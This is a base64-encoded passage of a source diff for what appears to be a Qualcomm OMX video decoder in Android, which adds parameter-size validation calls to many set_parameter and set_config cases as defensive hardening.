gICAgICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgIGNhc2UgT01YX0luZGV4UGFyYW1WaWRlb1BvcnRGb3JtYXQ6IHsKKyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVkFMSURBVEVfT01YX1BBUkFNX0RBVEEocGFyYW1EYXRhLCBPTVhfVklERU9fUEFSQU1fUE9SVEZPUk1BVFRZUEUpOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPTVhfVklERU9fUEFSQU1fUE9SVEZPUk1BVFRZUEUgKnBvcnRGbXQgPQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgKE9NWF9WSURFT19QQVJBTV9QT1JURk9STUFUVFlQRSAqKXBhcmFtRGF0YTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW50IHJldD0wOwpAQCAtMzU3MSw2ICszNTgzLDcgQEAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICBicmVhazsKIAogICAgICAgICBjYXNlIE9NWF9RY29tSW5kZXhQb3J0RGVmbjogeworICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZBTElEQVRFX09NWF9QQVJBTV9EQVRBKHBhcmFtRGF0YSwgT01YX1FDT01fUEFSQU1fUE9SVERFRklOSVRJT05UWVBFKTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPTVhfUUNPTV9QQVJBTV9QT1JUREVGSU5JVElPTlRZUEUgKnBvcnRGbXQgPQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAoT01YX1FDT01fUEFSQU1fUE9SVERFRklOSVRJT05UWVBFICopIHBhcmFtRGF0YTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICBERUJVR19QUklOVF9MT1coInNldF9wYXJhbWV0ZXI6IE9NWF9JbmRleFFjb21QYXJhbVBvcnREZWZpbml0aW9uVHlwZSAldSIsCkBAIC0zNjE3LDYgKzM2MzAsNyBAQAogICAgICAgICAgICAgICAgICAgICAgICAgYnJlYWs7CiAKICAgICAgICAgY2FzZSBPTVhfSW5kZXhQYXJhbVN0YW5kYXJkQ29tcG9uZW50Um9sZTogeworICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZBTElEQVRFX09NWF9QQVJBTV9EQVRBKHBhcmFtRGF0YSwgT01YX1BBUkFNX0NPTVBPTkVOVFJPTEVUWVBFKTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPTVhfUEFSQU1fQ09NUE9ORU5UUk9MRVRZUEUgKmNvbXBfcm9sZTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb21wX3JvbGUgPSAoT01YX1BBUkFNX0NPTVBPTkVOVFJPTEVUWVBFICopIHBhcmFtRGF0YTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBERUJVR19QUklOVF9MT1coInNldF9wYXJhbWV0ZXI6IE9NWF9JbmRleFBhcmFtU3RhbmRhcmRDb21wb25lbnRSb2xlICVzIiwKQEAgLTM3MDcsNiArMzcyMSw3IEBACiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9CiAKICAgICAgICAgY2FzZSBPTVhfSW5kZXhQYXJhbVByaW9yaXR5TWdtdDogeworICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShwYXJhbURhdGEsIE9NWF9QUklPUklUWU1HTVRUWVBFKTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgKG1fc3RhdGUgIT0gT01YX1N0YXRlTG9hZGVkKSB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBERUJVR19QUklOVF9FUlJPUigiU2V0IFBhcmFtZXRlciBjYWxsZWQgaW4gSW52YWxpZCBTdGF0ZSIpOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcmV0dXJuIE9NWF9FcnJvckluY29ycmVjdFN0YXRlT3BlcmF0aW9uOwpAQCAtMzcyNSw2ICszNzQwLDcgQEAKICAgICAgICAgICAgICAgICAgICAgICAgICB9CiAKICAgICAgICAgY2FzZSBPTVhfSW5kZXhQYXJhbUNvbXBCdWZmZXJTdXBwbGllcjogeworICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShwYXJhbURhdGEsIE9NWF9QQVJBTV9CVUZGRVJTVVBQTElFUlRZUEUpOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPTVhfUEFSQU1fQlVGRkVSU1VQUExJRVJUWVBFICpidWZmZXJTdXBwbGllclR5cGUgPSAoT01YX1BBUkFNX0JVRkZFUlNVUFBMSUVSVFlQRSopIHBhcmFtRGF0YTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREVCVUdfUFJJTlRfTE9XKCJzZXRfcGFyYW1ldGVyOiBPTVhfSW5kZXhQYXJhbUNvbXBCdWZmZXJTdXBwbGllciAlZCIsCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYnVmZmVyU3VwcGxpZXJUeXBlLT5lQnVmZmVyU3VwcGxpZXIpOwpAQCAtMzc2NCw2ICszNzgwLDcgQEAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBicmVhazsKICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgY2FzZSBPTVhfUWNvbUluZGV4UGFyYW1WaWRlb0RlY29kZXJQaWN0dXJlT3JkZXI6IHsKKyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShwYXJhbURhdGEsIFFPTVhfVklERU9fREVDT0RFUl9QSUNUVVJFX09SREVSKTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRT01YX1ZJREVPX0RFQ09ERVJfUElDVFVSRV9PUkRFUiAqcGljdHVyZU9yZGVyID0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgKFFPTVhfVklERU9fREVDT0RFUl9QSUNUVVJFX09SREVSICopcGFyYW1EYXRhOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN0cnVjdCB2NGwyX2NvbnRyb2wgY29udHJvbDsKQEAgLTM3ODksNDIgKzM4MDYsNTIgQEAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBicmVhazsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgY2FzZSBPTVhfUWNvbUluZGV4UGFyYW1Db25jZWFsTUJNYXBFeHRyYURhdGE6CisgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVkFMSURBVEVfT01YX1BBUkFNX0RBVEEocGFyYW1EYXRhLCBRT01YX0VOQUJMRVRZUEUpOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVSZXQgPSBlbmFibGVfZXh0cmFkYXRhKFZERUNfRVhUUkFEQVRBX01CX0VSUk9SX01BUCwgZmFsc2UsCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAoKFFPTVhfRU5BQkxFVFlQRSAqKXBhcmFtRGF0YSktPmJFbmFibGUpOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgIGNhc2UgT01YX1Fjb21JbmRleFBhcmFtRnJhbWVJbmZvRXh0cmFEYXRhOgorICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZBTElEQVRFX09NWF9QQVJBTV9EQVRBKHBhcmFtRGF0YSwgUU9NWF9FTkFCTEVUWVBFKTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVSZXQgPSBlbmFibGVfZXh0cmFkYXRhKE9NWF9GUkFNRUlORk9fRVhUUkFEQVRBLCBmYWxzZSwKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgKChRT01YX0VOQUJMRVRZUEUgKilwYXJhbURhdGEpLT5iRW5hYmxlKTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgIGNhc2UgT01YX0V4dHJhRGF0YUZyYW1lRGltZW5zaW9uOgorICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZBTElEQVRFX09NWF9QQVJBTV9EQVRBKHBhcmFtRGF0YSwgUU9NWF9FTkFCTEVUWVBFKTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlUmV0ID0gZW5hYmxlX2V4dHJhZGF0YShPTVhfRlJBTUVESU1FTlNJT05fRVhUUkFEQVRBLCBmYWxzZSwKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICgoUU9NWF9FTkFCTEVUWVBFICopcGFyYW1EYXRhKS0+YkVuYWJsZSk7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgIGNhc2UgT01YX1Fjb21JbmRleFBhcmFtSW50ZXJsYWNlRXh0cmFEYXRhOgorICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZBTElEQVRFX09NWF9QQVJBTV9EQVRBKHBhcmFtRGF0YSwgUU9NWF9FTkFCTEVUWVBFKTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZVJldCA9IGVuYWJsZV9leHRyYWRhdGEoT01YX0lOVEVSTEFDRV9FWFRSQURBVEEsIGZhbHNlLAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICgoUU9NWF9FTkFCTEVUWVBFICopcGFyYW1EYXRhKS0+YkVuYWJsZSk7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgIGNhc2UgT01YX1Fjb21JbmRleFBhcmFtSDI2NFRpbWVJbmZvOgorICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZBTElEQVRFX09NWF9QQVJBTV9EQVRBKHBhcmFtRGF0YSwgUU9NWF9FTkFCTEVUWVBFKTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZVJldCA9IGVuYWJsZV9leHRyYWRhdGEoT01YX1RJTUVJTkZPX0VYVFJBREFUQSwgZmFsc2UsCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgKChRT01YX0VOQUJMRVRZUEUgKilwYXJhbURhdGEpLT5iRW5hYmxlKTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBicmVhazsKICAgICAgICAgY2FzZSBPTVhfUWNvbUluZGV4UGFyYW1WaWRlb0ZyYW1lUGFja2luZ0V4dHJhZGF0YToKKyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShwYXJhbURhdGEsIFFPTVhfRU5BQkxFVFlQRSk7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZVJldCA9IGVuYWJsZV9leHRyYWRhdGEoT01YX0ZSQU1FUEFDS19FWFRSQURBVEEsIGZhbHNlLAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgKChRT01YX0VOQUJMRVRZUEUgKilwYXJhbURhdGEpLT5iRW5hYmxlKTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBicmVhazsKICAgICAgICAgY2FzZSBPTVhfUWNvbUluZGV4UGFyYW1WaWRlb1FQRXh0cmFEYXRhOgorICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZBTElEQVRFX09NWF9QQVJBTV9EQVRBKHBhcmFtRGF0YSwgUU9NWF9FTkFCTEVUWVBFKTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlUmV0ID0gZW5hYmxlX2V4dHJhZGF0YShPTVhfUVBfRVhUUkFEQVRBLCBmYWxzZSwKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICgoUU9NWF9FTkFCTEVUWVBFICopcGFyYW1EYXRhKS0+YkVuYWJsZSk7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgIGNhc2UgT01YX1Fjb21JbmRleFBhcmFtVmlkZW9JbnB1dEJpdHNJbmZvRXh0cmFEYXRhOgorICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZBTElEQVRFX09NWF9QQVJBTV9EQVRBKHBhcmFtRGF0YSwgUU9NWF9FTkFCTEVUWVBFKTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlUmV0ID0gZW5hYmxlX2V4dHJhZGF0YShPTVhfQklUU0lORk9fRVhUUkFEQVRBLCBmYWxzZSwKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICgoUU9NWF9FTkFCTEVUWVBFICopcGFyYW1EYXRhKS0+YkVuYWJsZSk7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgIGNhc2UgT01YX1Fjb21JbmRleEVuYWJsZUV4dG5Vc2VyRGF0YToKKyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShwYXJhbURhdGEsIFFPTVhfRU5BQkxFVFlQRSk7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVSZXQgPSBlbmFibGVfZXh0cmFkYXRhKE9NWF9FWFROVVNFUl9FWFRSQURBVEEsIGZhbHNlLAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgKChRT01YX0VOQUJMRVRZUEUgKilwYXJhbURhdGEpLT5iRW5hYmxlKTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBicmVhazsKICAgICAgICAgY2FzZSBPTVhfUWNvbUluZGV4UGFyYW1NcGVnMlNlcURpc3BFeHRyYURhdGE6CisgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVkFMSURBVEVfT01YX1BBUkFNX0RBVEEocGFyYW1EYXRhLCBRT01YX0VOQUJMRVRZUEUpOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlUmV0ID0gZW5hYmxlX2V4dHJhZGF0YShPTVhfTVBFRzJTRVFESVNQX0VYVFJBREFUQSwgZmFsc2UsCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAoKFFPTVhfRU5BQkxFVFlQRSAqKXBhcmFtRGF0YSktPmJFbmFibGUpOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBicmVhazsKQEAgLTM4MzMsNiArMzg2MCw3IEBACiAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgIGNhc2UgT01YX1Fjb21JbmRleFBsYXRmb3JtUHZ0OiB7CisgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVkFMSURBVEVfT01YX1BBUkFNX0RBVEEocGFyYW1EYXRhLCBPTVhfUUNPTV9QTEFURk9STVBSSVZBVEVfRVhUTik7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREVCVUdfUFJJTlRfSElHSCgic2V0X3BhcmFtZXRlcjogT01YX1Fjb21JbmRleFBsYXRmb3JtUHZ0IE9QIFBvcnQiKTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPTVhfUUNPTV9QTEFURk9STVBSSVZBVEVfRVhUTiogZW50cnlUeXBlID0gKE9NWF9RQ09NX1BMQVRGT1JNUFJJVkFURV9FWFROICopIHBhcmFtRGF0YTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZiAoZW50cnlUeXBlLT50eXBlICE9IE9NWF9RQ09NX1BMQVRGT1JNX1BSSVZBVEVfUE1FTSkgewpAQCAtMzg4Myw2ICszOTExLDcgQEAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYnJlYWs7CiAKICAgICAgICAgY2FzZSBPTVhfUWNvbUluZGV4UGFyYW1JbmRleEV4dHJhRGF0YVR5cGU6IHsKKyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZBTElEQVRFX09NWF9QQVJBTV9EQVRBKHBhcmFtRGF0YSwgUU9NWF9JTkRFWEVYVFJBREFUQVRZUEUpOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUU9NWF9JTkRFWEVYVFJBREFUQVRZUEUgKmV4dHJhZGF0YUluZGV4VHlwZSA9IChRT01YX0lOREVYRVhUUkFEQVRBVFlQRSAqKSBwYXJhbURhdGE7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZiAoKGV4dHJhZGF0YUluZGV4VHlwZS0+bkluZGV4ID09IE9NWF9JbmRleFBhcmFtUG9ydERlZmluaXRpb24pICYmCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIChleHRyYWRhdGFJbmRleFR5cGUtPmJFbmFibGVkID09IE9NWF9UUlVFKSAmJgpAQCAtMzkwNiw2ICszOTM1LDcgQEAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgKiBzdGF0ZS4gVGhpcyBpcyBBTkRST0lEIGFyY2hpdGVjdHVyZSB3aGljaCBpcyBub3QgaW4gc3luYwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAqIHdpdGggb3Blbm1heCBzdGFuZGFyZC4gKi8KICAgICAgICAgY2FzZSBPTVhfR29vZ2xlQW5kcm9pZEluZGV4RW5hYmxlQW5kcm9pZE5hdGl2ZUJ1ZmZlcnM6IHsKKyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShwYXJhbURhdGEsIEVuYWJsZUFuZHJvaWROYXRpdmVCdWZmZXJzUGFyYW1zKTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFbmFibGVBbmRyb2lkTmF0aXZlQnVmZmVyc1BhcmFtcyogZW5hYmxlTmF0aXZlQnVmZmVycyA9IChFbmFibGVBbmRyb2lkTmF0aXZlQnVmZmVyc1BhcmFtcyAqKSBwYXJhbURhdGE7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgKGVuYWJsZU5hdGl2ZUJ1ZmZlcnMpIHsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbV9lbmFibGVfYW5kcm9pZF9uYXRpdmVfYnVmZmVycyA9IGVuYWJsZU5hdGl2ZUJ1ZmZlcnMtPmVuYWJsZTsKQEAgLTM5MjIsMTEgKzM5NTIsMTMgQEAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJyZWFrOwogICAgICAgICBjYXNlIE9NWF9Hb29nbGVBbmRyb2lkSW5kZXhVc2VBbmRyb2lkTmF0aXZlQnVmZmVyOiB7CisgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShwYXJhbURhdGEsIFVzZUFuZHJvaWROYXRpdmVCdWZmZXJQYXJhbXMpOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZVJldCA9IHVzZV9hbmRyb2lkX25hdGl2ZV9idWZmZXIoaENvbXAsIHBhcmFtRGF0YSk7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYnJlYWs7CiAjZW5kaWYKICAgICAgICAgY2FzZSBPTVhfUWNvbUluZGV4UGFyYW1FbmFibGVUaW1lU3RhbXBSZW9yZGVyOiB7CisgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShwYXJhbURhdGEsIFFPTVhfSU5ERVhUSU1FU1RBTVBSRU9SREVSKTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFPTVhfSU5ERVhUSU1FU1RBTVBSRU9SREVSICpyZW9yZGVyID0gKFFPTVhfSU5ERVhUSU1FU1RBTVBSRU9SREVSICopcGFyYW1EYXRhOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgKGRydl9jdHgucGljdHVyZV9vcmRlciA9PSAodmRlY19vdXRwdXRfb3JkZXIpUU9NWF9WSURFT19ESVNQTEFZX09SREVSKSB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgKHJlb3JkZXItPmJFbmFibGUgPT0gT01YX1RSVUUpIHsKQEAgLTM5NDMsNiArMzk3NSw3IEBACiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgIGNhc2UgT01YX0luZGV4UGFyYW1WaWRlb1Byb2ZpbGVMZXZlbEN1cnJlbnQ6IHsKKyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShwYXJhbURhdGEsIE9NWF9WSURFT19QQVJBTV9QUk9GSUxFTEVWRUxUWVBFKTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPTVhfVklERU9fUEFSQU1fUFJPRklMRUxFVkVMVFlQRSogcFBhcmFtID0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgKE9NWF9WSURFT19QQVJBTV9QUk9GSUxFTEVWRUxUWVBFKilwYXJhbURhdGE7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgKHBQYXJhbSkgewpAQCAtMzk1NCw2ICszOTg3LDcgQEAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgY2FzZSBPTVhfUWNvbUluZGV4UGFyYW1WaWRlb01ldGFCdWZmZXJNb2RlOgogICAgICAgICB7CisgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShwYXJhbURhdGEsIFN0b3JlTWV0YURhdGFJbkJ1ZmZlcnNQYXJhbXMpOwogICAgICAgICAgICAgU3RvcmVNZXRhRGF0YUluQnVmZmVyc1BhcmFtcyAqbWV0YWJ1ZmZlciA9CiAgICAgICAgICAgICAgICAgKFN0b3JlTWV0YURhdGFJbkJ1ZmZlcnNQYXJhbXMgKilwYXJhbURhdGE7CiAgICAgICAgICAgICBpZiAoIW1ldGFidWZmZXIpIHsKQEAgLTM5OTYsNiArNDAzMCw3IEBACiAgICAgICAgIH0KICAgICAgICAgY2FzZSBPTVhfUWNvbUluZGV4UGFyYW1WaWRlb0Rvd25TY2FsYXI6CiAgICAgICAgIHsKKyAgICAgICAgICAgIFZBTElEQVRFX09NWF9QQVJBTV9EQVRBKHBhcmFtRGF0YSwgUU9NWF9JTkRFWERPV05TQ0FMQVIpOwogICAgICAgICAgICAgUU9NWF9JTkRFWERPV05TQ0FMQVIqIHBQYXJhbSA9IChRT01YX0lOREVYRE9XTlNDQUxBUiopcGFyYW1EYXRhOwogICAgICAgICAgICAgc3RydWN0IHY0bDJfY29udHJvbCBjb250cm9sOwogICAgICAgICAgICAgaW50IHJjOwpAQCAtNDAyNCw2ICs0MDU5LDcgQEAKICNpZmRlZiBBREFQVElWRV9QTEFZQkFDS19TVVBQT1JURUQKICAgICAgICAgY2FzZSBPTVhfUWNvbUluZGV4UGFyYW1WaWRlb0FkYXB0aXZlUGxheWJhY2tNb2RlOgogICAgICAgICB7CisgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShwYXJhbURhdGEsIFByZXBhcmVGb3JBZGFwdGl2ZVBsYXliYWNrUGFyYW1zKTsKICAgICAgICAgICAgIERFQlVHX1BSSU5UX0xPVygic2V0X3BhcmFtZXRlcjogT01YX0dvb2dsZUFuZHJvaWRJbmRleFByZXBhcmVGb3JBZGFwdGl2ZVBsYXliYWNrIik7CiAgICAgICAgICAgICBQcmVwYXJlRm9yQWRhcHRpdmVQbGF5YmFja1BhcmFtcyogcFBhcmFtcyA9CiAgICAgICAgICAgICAgICAgICAgIChQcmVwYXJlRm9yQWRhcHRpdmVQbGF5YmFja1BhcmFtcyAqKSBwYXJhbURhdGE7CkBAIC00MDUyLDYgKzQwODgsNyBAQAogI2VuZGlmCiAgICAgICAgIGNhc2UgT01YX1Fjb21JbmRleFBhcmFtVmlkZW9DdXN0b21CdWZmZXJTaXplOgogICAgICAgICB7CisgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShwYXJhbURhdGEsIFFPTVhfVklERU9fQ1VTVE9NX0JVRkZFUlNJWkUpOwogICAgICAgICAgICAgREVCVUdfUFJJTlRfTE9XKCJzZXRfcGFyYW1ldGVyOiBPTVhfUWNvbUluZGV4UGFyYW1WaWRlb0N1c3RvbUJ1ZmZlclNpemUiKTsKICAgICAgICAgICAgIFFPTVhfVklERU9fQ1VTVE9NX0JVRkZFUlNJWkUqIHBQYXJhbSA9IChRT01YX1ZJREVPX0NVU1RPTV9CVUZGRVJTSVpFKilwYXJhbURhdGE7CiAgICAgICAgICAgICBpZiAocFBhcmFtLT5uUG9ydEluZGV4ID09IE9NWF9DT1JFX0lOUFVUX1BPUlRfSU5ERVgpIHsKQEAgLTQxMTUsNiArNDE1Miw3IEBACiAKICAgICBzd2l0Y2ggKCh1bnNpZ25lZCBsb25nKWNvbmZpZ0luZGV4KSB7CiAgICAgICAgIGNhc2UgT01YX1Fjb21JbmRleENvbmZpZ0ludGVybGFjZWQ6IHsKKyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVkFMSURBVEVfT01YX1BBUkFNX0RBVEEoY29uZmlnRGF0YSwgT01YX1FDT01fQ09ORklHX0lOVEVSTEFDRVRZUEUpOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPTVhfUUNPTV9DT05GSUdfSU5URVJMQUNFVFlQRSAqY29uZmlnRm10ID0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIChPTVhfUUNPTV9DT05GSUdfSU5URVJMQUNFVFlQRSAqKSBjb25maWdEYXRhOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZiAoY29uZmlnRm10LT5uUG9ydEluZGV4ID09IDEpIHsKQEAgLTQxNDAsNiArNDE3OCw3IEBACiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJyZWFrOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgY2FzZSBPTVhfUWNvbUluZGV4UXVlcnlOdW1iZXJPZlZpZGVvRGVjSW5zdGFuY2U6IHsKKyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShjb25maWdEYXRhLCBRT01YX1ZJREVPX1FVRVJZX0RFQ09ERVJfSU5TVEFOQ0VTKTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRT01YX1ZJREVPX1FVRVJZX0RFQ09ERVJfSU5TVEFOQ0VTICpkZWNvZGVyaW5zdGFuY2VzID0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgKFFPTVhfVklERU9fUVVFUllfREVDT0RFUl9JTlNUQU5DRVMqKWNvbmZpZ0RhdGE7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZGVjb2Rlcmluc3RhbmNlcy0+bk51bU9mSW5zdGFuY2VzID0gMTY7CkBAIC00MTQ4LDYgKzQxODcsNyBAQAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICBjYXNlIE9NWF9RY29tSW5kZXhDb25maWdWaWRlb0ZyYW1lUGFja2luZ0FycmFuZ2VtZW50OiB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZiAoZHJ2X2N0eC5kZWNvZGVyX2Zvcm1hdCA9PSBWREVDX0NPREVDVFlQRV9IMjY0KSB7CisgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVkFMSURBVEVfT01YX1BBUkFNX0RBVEEoY29uZmlnRGF0YSwgT01YX1FDT01fRlJBTUVfUEFDS19BUlJBTkdFTUVOVCk7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT01YX1FDT01fRlJBTUVfUEFDS19BUlJBTkdFTUVOVCAqY29uZmlnRm10ID0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgKE9NWF9RQ09NX0ZSQU1FX1BBQ0tfQVJSQU5HRU1FTlQgKikgY29uZmlnRGF0YTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtZW1jcHkoY29uZmlnRm10LCAmbV9mcmFtZV9wYWNrX2FycmFuZ2VtZW50LApAQCAtNDE1OCw2ICs0MTk4LDcgQEAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJyZWFrOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9CiAgICAgICAgIGNhc2UgT01YX0luZGV4Q29uZmlnQ29tbW9uT3V0cHV0Q3JvcDogeworICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZBTElEQVRFX09NWF9QQVJBTV9EQVRBKGNvbmZpZ0Rhd